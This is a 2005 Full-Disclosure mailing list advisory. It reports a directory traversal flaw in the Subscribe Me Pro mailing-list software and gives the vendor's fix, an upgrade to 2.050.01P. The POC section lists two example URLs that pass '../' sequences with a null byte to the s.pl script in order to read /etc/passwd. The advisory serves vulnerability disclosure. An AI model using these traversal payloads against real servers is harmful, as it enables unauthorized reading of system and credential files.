[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <68cbfab105091306411e94a3d4@mail.gmail.com>
Date: Tue, 13 Sep 2005 19:11:34 +0530
From: h4cky0u <h4cky0u.org@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: Subscribe Me Pro 2.044.09P and prior Directory
Traversal Vulnerability (Updated)
------------------------------------------------------
HYA-2005-006 h4cky0u.org <http://h4cky0u.org> Advisory 007
------------------------------------------------------
Date - Tue Sep 13 2005
TITLE:
======
Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability
SEVERITY:
=========
High
SOFTWARE:
=========
Subscribe Me Pro 2.044.09P and prior
Support Website : http://siteinteractive.com/subpro/
INFO:
=====
Subscribe Me Professional is designed to assist with the building,
maintaining, mailing, and tracking of your customer/prospect mailing lists.
BUG DESCRIPTION:
================
Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal
vulnerability. This issue is due to a failure in the application to properly
sanitize user-supplied input. An unauthorized user can retrieve arbitrary
files by supplying directory traversal strings '../' to the vulnerable
parameter.
POC:
====
Here are some examples:
http://www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20
http://www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00
VENDOR STATUS:
==============
Vendor Contact : 13th Sep 2005
Vendor Reply : 13th sep 2005 - This Vulnerability has been fixed in the
Latest Release : 2.050.01P
FIX:
====
Upgrade to version 2.050.01P
CREDITS:
========
This vulnerability was discovered and researched by -
ShoCK FX of h4cky0u Security Forums.
mail : shockfx at gmail dot com
web : http://www.h4cky0u.org
Co Researcher -
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail dot com
web : http://www.h4cky0u.org
ORIGINAL ADVISORY:
=================
http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt
--
http://www.h4cky0u.org
(In)Security at its best...
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists